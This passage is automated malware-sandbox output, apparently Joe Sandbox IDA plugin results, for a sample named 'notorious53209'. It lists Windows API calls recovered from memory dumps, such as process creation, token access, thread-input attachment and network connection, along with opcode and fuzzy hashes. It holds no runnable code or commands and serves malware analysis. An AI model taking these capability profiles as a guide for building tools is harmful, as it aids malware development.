                                            • Instruction Fuzzy Hash: 73115A31C2051ED7CF009FAAED88AEEBB78FF09741F054555E944B6240CB7055708B96
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                            • String ID:
                                            • API String ID: 3016257755-0
                                            • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                            • Instruction ID: 4815c4054db04c7e9b2961252ae99cc5563affe2a26110f9838eb1e26b2b20ff
                                            • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                            • Instruction Fuzzy Hash: B1014C3606814ABBCF125F94EC218EE3F62BF69359F588615FE1858031D237C9B5AB81
                                            APIs
                                            • GetWindowRect.USER32(?,?), ref: 002BB59E
                                            • ScreenToClient.USER32(?,?), ref: 002BB5B6
                                            • ScreenToClient.USER32(?,?), ref: 002BB5DA
                                            • InvalidateRect.USER32(?,?,?), ref: 002BB5F5
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: ClientRectScreen$InvalidateWindow
                                            • String ID:
                                            • API String ID: 357397906-0
                                            • Opcode ID: 3059a1a6f0779ab9ac04871bbaf265d31adf61fc355aebe802eb09c58531c13f
                                            • Instruction ID: deee7ebf2c1b2a0b58c461acc6e1f3eef6dfa1a3978e86bb8b29c1e90a1446d5
                                            • Opcode Fuzzy Hash: 3059a1a6f0779ab9ac04871bbaf265d31adf61fc355aebe802eb09c58531c13f
                                            • Instruction Fuzzy Hash: 7A1166B5D00209EFDB41CF99D9449EEFBB9FB18310F108166E954E3220D731AA618F51
                                            APIs
                                            • _memset.LIBCMT ref: 002BB8FE
                                            • _memset.LIBCMT ref: 002BB90D
                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,002F7F20,002F7F64), ref: 002BB93C
                                            • CloseHandle.KERNEL32 ref: 002BB94E
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: _memset$CloseCreateHandleProcess
                                            • String ID:
                                            • API String ID: 3277943733-0
                                            • Opcode ID: a67b7a1d1757e65160a053c4c1ccac5d9dbca3ab2ef4b893e35d3cc9a98f148f
                                            • Instruction ID: 26280d58c99eea32dcb99d9bd519f65c9856ecaae2405abe0e022d4c92af3d2c
                                            • Opcode Fuzzy Hash: a67b7a1d1757e65160a053c4c1ccac5d9dbca3ab2ef4b893e35d3cc9a98f148f
                                            • Instruction Fuzzy Hash: 9AF082B25543047BF2106B61BC0AFBB7A9CEB083E4F000171FB08D5692D7718D20CBA8
                                            APIs
                                            • RtlEnterCriticalSection.NTDLL(?), ref: 00296E88
                                              • Part of subcall function 0029794E: _memset.LIBCMT ref: 00297983
                                            • _memmove.LIBCMT ref: 00296EAB
                                            • _memset.LIBCMT ref: 00296EB8
                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 00296EC8
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: CriticalSection_memset$EnterLeave_memmove
                                            • String ID:
                                            • API String ID: 48991266-0
                                            • Opcode ID: 3343a52defc9c7a33c8a036ec4fa08b3984b83cae43dcf253ecdf1a1f91860b7
                                            • Instruction ID: 88e60378386115c434722b641437d8827d922dd7318b8f3e50090cfa39143cc4
                                            • Opcode Fuzzy Hash: 3343a52defc9c7a33c8a036ec4fa08b3984b83cae43dcf253ecdf1a1f91860b7
                                            • Instruction Fuzzy Hash: 28F0543A200210BBCF416F55EC85A4ABB29EF45361B048061FE085E256C731E921CFB4
                                            APIs
                                              • Part of subcall function 002312F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 0023134D
                                              • Part of subcall function 002312F3: SelectObject.GDI32(?,00000000), ref: 0023135C
                                              • Part of subcall function 002312F3: BeginPath.GDI32(?), ref: 00231373
                                              • Part of subcall function 002312F3: SelectObject.GDI32(?,00000000), ref: 0023139C
                                            • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 002BC030
                                            • LineTo.GDI32(00000000,?,?), ref: 002BC03D
                                            • EndPath.GDI32(00000000), ref: 002BC04D
                                            • StrokePath.GDI32(00000000), ref: 002BC05B
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                            • String ID:
                                            • API String ID: 1539411459-0
                                            • Opcode ID: 52953ab7cbdba97d8becbde3c95e274bd5bda5925ae462d91c52fcdd022090db
                                            • Instruction ID: 5bdf0af090ea75232d0ee7f184f875d95bdc5be844903ee426fb12e36caa8621
                                            • Opcode Fuzzy Hash: 52953ab7cbdba97d8becbde3c95e274bd5bda5925ae462d91c52fcdd022090db
                                            • Instruction Fuzzy Hash: 5CF0BE32004229BBDB123F54FC0DFDE3F68AF05361F144110FA11210E287760964CF95
                                            APIs
                                            • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0028A399
                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 0028A3AC
                                            • GetCurrentThreadId.KERNEL32(00000000), ref: 0028A3B3
                                            • AttachThreadInput.USER32(00000000), ref: 0028A3BA
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                            • String ID:
                                            • API String ID: 2710830443-0
                                            • Opcode ID: 82be72096287c4efc3cb5f2a79a98a53217386c411261d1295b0bbc1fdc9f580
                                            • Instruction ID: c210afa5b3adc6b9acfb1debac8511600f806f354da4d57b75fb5ed1193a07ad
                                            • Opcode Fuzzy Hash: 82be72096287c4efc3cb5f2a79a98a53217386c411261d1295b0bbc1fdc9f580
                                            • Instruction Fuzzy Hash: 43E06D31542328BAEB202FA2ED0CFD73F1CEF167A1F008125F909840A0CA71D560CBA0
                                            APIs
                                            • GetSysColor.USER32(00000008), ref: 00232231
                                            • SetTextColor.GDI32(?,000000FF), ref: 0023223B
                                            • SetBkMode.GDI32(?,00000001), ref: 00232250
                                            • GetStockObject.GDI32(00000005), ref: 00232258
                                            • GetWindowDC.USER32(?), ref: 0026C0D3
                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 0026C0E0
                                            • GetPixel.GDI32(00000000,?,00000000), ref: 0026C0F9
                                            • GetPixel.GDI32(00000000,00000000,?), ref: 0026C112
                                            • GetPixel.GDI32(00000000,?,?), ref: 0026C132
                                            • ReleaseDC.USER32(?,00000000), ref: 0026C13D
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                            • String ID:
                                            • API String ID: 1946975507-0
                                            • Opcode ID: 2ae277d7852df76b31b6ec281db2e54f76edc9028f3429af6acdcef6bb7f9b42
                                            • Instruction ID: b94cb485c07b9f25c64ce33a3fdcd5828a1600236d4e44f8aaffc702575604b1
                                            • Opcode Fuzzy Hash: 2ae277d7852df76b31b6ec281db2e54f76edc9028f3429af6acdcef6bb7f9b42
                                            • Instruction Fuzzy Hash: 3BE06D32110245EADF615F68FD0D7E83B14EB15332F108366FAAD580E1877189D0DB11
                                            APIs
                                            • GetCurrentThread.KERNEL32(00000028,00000000,?,00000000,002886DD,?,?,?,0028882E), ref: 00288C63
                                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,0028882E), ref: 00288C6A
                                            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0028882E), ref: 00288C77
                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,0028882E), ref: 00288C7E
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: CurrentOpenProcessThreadToken
                                            • String ID:
                                            • API String ID: 3974789173-0
                                            • Opcode ID: c46e16e6f5b4c61add61eed6c91cc43bfe46222ba359fead8fe11d729116547f
                                            • Instruction ID: 967c0f88bc41150fee6179a8d017d8037200b04ec5636f5d45027a8338bd9185
                                            • Opcode Fuzzy Hash: c46e16e6f5b4c61add61eed6c91cc43bfe46222ba359fead8fe11d729116547f
                                            • Instruction Fuzzy Hash: 06E08636646211EBD7606FB07F0CB563BACEF54792F048928B645C9094DA348441CB61
                                            APIs
                                            • GetDesktopWindow.USER32 ref: 00272187
                                            • GetDC.USER32(00000000), ref: 00272191
                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 002721B1
                                            • ReleaseDC.USER32(?), ref: 002721D2
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: CapsDesktopDeviceReleaseWindow
                                            • String ID:
                                            • API String ID: 2889604237-0
                                            • Opcode ID: 892d9b73e9048e9d53628b42bab8a3a8c5ad3d07484e86cc8181e6ae1917959a
                                            • Instruction ID: 0f1aa45a9f11dacc0e6b6a3fe7cb939c718268ed49502afe18d424d52eaf90e9
                                            • Opcode Fuzzy Hash: 892d9b73e9048e9d53628b42bab8a3a8c5ad3d07484e86cc8181e6ae1917959a
                                            • Instruction Fuzzy Hash: 04E01AB5820204EFDB419F60ED0CAAD7BF9FB4C350F208525FDAAA7220CB7881519F40
                                            APIs
                                            • GetDesktopWindow.USER32 ref: 0027219B
                                            • GetDC.USER32(00000000), ref: 002721A5
                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 002721B1
                                            • ReleaseDC.USER32(?), ref: 002721D2
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: CapsDesktopDeviceReleaseWindow
                                            • String ID:
                                            • API String ID: 2889604237-0
                                            • Opcode ID: 79ccbcee73d58559b661567a71a818e18ae027af1cb0bba2ab380c9ef3586cf2
                                            • Instruction ID: b7bac3210410ecf2592add687029364e7048cbc5bc0840063d7b99a66ae58d19
                                            • Opcode Fuzzy Hash: 79ccbcee73d58559b661567a71a818e18ae027af1cb0bba2ab380c9ef3586cf2
                                            • Instruction Fuzzy Hash: 5FE01AB5810204AFCB419F70ED0C69D7BF9EB4C310F108525FDAAA7220CB7891419F40
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: %,
                                            • API String ID: 0-1041901720
                                            • Opcode ID: 9561b3450693ca22b558cd54a8241a826423cba66998ec885a6d6a494026ae38
                                            • Instruction ID: 23b7b9dcb8717f81b6b9de9a39c46cdf382dec1c0371c5c2061e149c6a13fad5
                                            • Opcode Fuzzy Hash: 9561b3450693ca22b558cd54a8241a826423cba66998ec885a6d6a494026ae38
                                            • Instruction Fuzzy Hash: 30B1B2F1D2020AABCF24EF94C4899FDB7BDEF04310F548026E905A7195DB709EA6CB51
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: __itow_s
                                            • String ID: xr/$xr/
                                            • API String ID: 3653519197-2231005825
                                            • Opcode ID: 36b3d28d85ca172236fb470f36f30924c4ecd76420c4e93e01d2af6351b84e9f
                                            • Instruction ID: 036abdbe6c2c3dd3ab3758853eb76ead486ad7175977ecfba2fd89ea42c1dfa3
                                            • Opcode Fuzzy Hash: 36b3d28d85ca172236fb470f36f30924c4ecd76420c4e93e01d2af6351b84e9f
                                            • Instruction Fuzzy Hash: 48B1A070A10209AFDF15DF54C890EBEB7B9FF59300F14845AF9459B252DB70E961CB50
                                            APIs
                                              • Part of subcall function 0024FEC6: _wcscpy.LIBCMT ref: 0024FEE9
                                              • Part of subcall function 00239997: __itow.LIBCMT ref: 002399C2
                                              • Part of subcall function 00239997: __swprintf.LIBCMT ref: 00239A0C
                                            • __wcsnicmp.LIBCMT ref: 0029B298
                                            • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0029B361
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                            • String ID: LPT
                                            • API String ID: 3222508074-1350329615
                                            • Opcode ID: 8b6a980e0d9457af43d207c478170fe3e955d9b8ea7e872a1708bdef70e0fb53
                                            • Instruction ID: 61e80f35af2c165963e5ec96e4bc41105ecb8e6dc1dd3086f7f880570a572a94
                                            • Opcode Fuzzy Hash: 8b6a980e0d9457af43d207c478170fe3e955d9b8ea7e872a1708bdef70e0fb53
                                            • Instruction Fuzzy Hash: 2061D575A20215EFCF05DF54D985EAEB7B4EF08310F004099F806AB291D770AE90CB54
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: _memmove
                                            • String ID: Oa$
                                            • API String ID: 4104443479-3294801368
                                            • Opcode ID: 2bd2b36a810f492884bdac11c08e3ea6d0547c699ea24ab6eb78565f0d7a7968
                                            • Instruction ID: 715315b7778026c09cb5cf912db54e544fa2e08bd56343fabcdb3bc9212b64fe
                                            • Opcode Fuzzy Hash: 2bd2b36a810f492884bdac11c08e3ea6d0547c699ea24ab6eb78565f0d7a7968
                                            • Instruction Fuzzy Hash: B6518070D1061ADFCF24CF68C484AAEBBF1FF44318F24856AE85AD7250EB70A965CB50
                                            APIs
                                            • Sleep.KERNEL32(00000000), ref: 00242AC8
                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 00242AE1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: GlobalMemorySleepStatus
                                            • String ID: @
                                            • API String ID: 2783356886-2766056989
                                            • Opcode ID: 75dd422447297dac1c5a4fe2829eb1d6ac7655121c7b026e9530ddd871cf7e12
                                            • Instruction ID: 2fc3892c84187044556e6a14ae0146a23818a1b66984d05977098bd3143be400
